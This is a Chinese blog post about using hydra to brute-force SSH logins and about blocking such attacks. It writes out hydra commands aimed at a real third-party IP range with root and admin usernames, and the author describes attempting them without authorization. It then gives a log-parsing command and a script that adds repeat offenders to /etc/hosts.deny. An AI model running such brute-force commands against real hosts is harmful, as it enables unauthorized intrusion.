美文网首页
攻击服务器后篇,hydra暴力破解ssh

攻击服务器后篇,hydra暴力破解ssh

作者: 螃蟹和骆驼先生Yvan | 来源:发表于2019-05-24 15:45 被阅读0次

    你们应该看到我下图服务器被攻击的提示,今天就来说说如何攻击,我们又该如何防护:


    前两次攻击是我自己攻击自己

    剩下那些ip攻击,就属于恶意攻击。防人之心不可无。
    先说说攻击模式如果你是Ubuntu系统直接就可以安装:
    apt install hydra
    就拿上面那些攻击我服务器ip来说吧(这里我不是恶意攻击只是举例):
    首先我说过攻击服务器前篇你必须知道人家的ip地址+端口
    ip:这块检测我还没想到怎么做
    端口,攻击服务器前篇我说过了如图:


    这个国外的服务器,开了3个端口,22,21,80
    剩下就是攻击了,我尝试过用22端口对其暴力破解。
    $hydra -l root -P 机房字典.txt -t 1 -vV -e ns 168.196.148.* ssh
    给我的

    我发现这个孩子是不是限制ip白名单,要fuck,不行我想是不是换端口搞他,我又切换端口21和用户 :
    hydra -l admin -P 机房字典.txt -s 21 -t 1 -vV -e ns 168.196.148.* ssh


    image.png

    这搞得我怀疑人生,防护这么好,我太菜。。。。


    image.png

    其实hydra破解很强大,基本上包含了所有http协议
    下面说说菜鸡防护介绍:
    先查看异常登录次数:
    cat /var/log/secure | awk '/Failed/{print $(NF-3)}' | sort -n| uniq -c| sort -rn


    异常登录次数

    加个脚本,我真实测试过报错和上面那个孩子服务器一样,限制ip访问了:

    LogPath=/var/log/secure
    LimitLine=20   #根据需求而定
    [ ! -f $LogPath ] && { echo "Warning:$LogPath is not exist!" ; exit 1;}
    for i in `cat $LogPath | awk '/Failed/{print $(NF-3)}' | sort -n| uniq -c| sort -rn| awk '{print $1":"$2}'`
    do
      NUM=`echo $i | awk -F: '{print $1}'`
      IP=`echo $i | awk -F: '{print $2}'`
      if [ $NUM -gt $LimitLine ];then
        grep $IP /etc/hosts.deny > /dev/null
          if [ $? -gt 0 ];then
            echo sshd:$IP >> /etc/hosts.deny
          fi
      fi
    done
    

    查看限制ip有哪些;
    $ cat /etc/hosts.deny


    可以看到限制ip登录了
    成功让我自己不能访问了

    相关文章

      网友评论

          本文标题:攻击服务器后篇,hydra暴力破解ssh

          本文链接:https://www.haomeiwen.com/subject/hhbgzqtx.html